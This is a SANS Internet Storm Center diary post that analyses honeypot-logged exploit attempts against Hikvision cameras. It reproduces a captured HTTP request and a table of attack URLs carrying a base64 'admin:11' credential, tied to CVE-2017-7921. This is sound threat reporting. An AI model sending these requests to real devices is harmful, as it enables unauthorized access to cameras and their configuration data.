(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Exploit Attempts Against Older Hikvision Camera Vulnerability, (Wed, Sep 24th)

This post was originally published on this site

I noticed a new URL showing up in our web honeypot logs, which looked a bit interesting:

/System/deviceInfo?auth=YWRtaW46MTEK

The full request:

GET /System/deviceInfo?auth=YWRtaW46MTEK
Host: 3.87.70.24
User-Agent: python-requests/2.32.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

The "auth" string caught my attention, in particular as it was followed by a base64 encoded string. The string decodes to admin:11.

This "auth" string has been around for a while for a number of Hikvision-related URLs. Until this week, the particular URL never hit our threshold to be included in our reports. So far, the "configurationFile" URL has been the most popular. It may give access to additional sensitive information.

 

Earliest Report   Most Recent Report   Total Number of Reports   URL
2018-08-18        2025-09-23           6720                      /System/configurationFile?auth=YWRtaW46MTEK
2017-12-14        2025-09-23           2293                      /Security/users?auth=YWRtaW46MTEK
2021-03-09        2025-09-23           2002                      /system/deviceInfo?auth=YWRtaW46MTEK
2020-09-25        2023-02-04           727                       /security/users/1?auth=YWRtaW46MTEK
2018-09-09        2025-09-23           445                       /onvif-http/snapshot?auth=YWRtaW46MTEK
2017-10-06        2017-10-06           6                         /Streaming/channels/1/picture/?auth=YWRtaW46MTEKYOBA
2025-04-09        2025-04-29           2                         /ISAPI/Security/users?auth=YWRtaW46MTEK

 

Some Googling leads to CVE-2017-7921 [1]. Hikvision's advisory is sparse and does not identify a particular vulnerable URL [2]. But this looks to me more like some brute forcing. The CVE-2017-7921 vulnerability is supposed to be some kind of backdoor (Hikvision's description of it as "privilege escalation" was considered euphemistic at the time). But I doubt the password is "11", and a typical Hikvision default password is much more complex ("123456" in the past).

We have written about Hikvision many times before; its cameras, as well as cameras from competitors like Dahua, are well known for their numerous security vulnerabilities, hard-coded "support passwords", and other issues. One issue with many of these cameras has been a limited user interface. The DVR used to collect footage from these cameras often only includes a mouse and an onscreen keyboard, making it difficult to select reasonable passwords. This attack may count on users setting a simple password like "11", as by default only a numeric onscreen keyboard is displayed on some models.

Another issue is the use of credentials in the URL, which is discouraged because they tend to leak easily in logs. But it may yet again be a convenience decision, as it allows creating hyperlinks that will log you in automatically.

 

[1] https://nvd.nist.gov/vuln/detail/cve-2017-7921
[2] https://www.hikvision.com/us-en/support/document-center/special-notices/privilege-escalating-vulnerability-in-certain-hikvision-ip-cameras/
 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.